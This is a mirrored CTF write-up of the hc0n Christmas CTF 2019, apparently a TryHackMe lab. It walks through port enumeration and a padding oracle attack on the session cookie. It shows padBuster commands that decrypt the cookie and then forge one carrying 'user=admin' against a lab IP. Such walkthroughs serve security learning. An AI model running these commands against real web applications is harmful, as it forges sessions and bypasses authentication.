Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 12:43:23 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md

1.3 KiB
Raw Blame History

hc0n Christmas CTF - 2019

Enumeration

I started enumerating the machine using my tool Legion:

There are 2 ports open: 80 **HTTP** and 22 **SSH**

In the web page you can register new users, and I noticed that the length of the cookie depends on the length of the username indicated:

And if you change some byte of the cookie you get this error:

With this information and reading the padding oracle vulnerability I was able to exploit it:

perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy"

Set user admin:

perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" -plaintext "user=admin"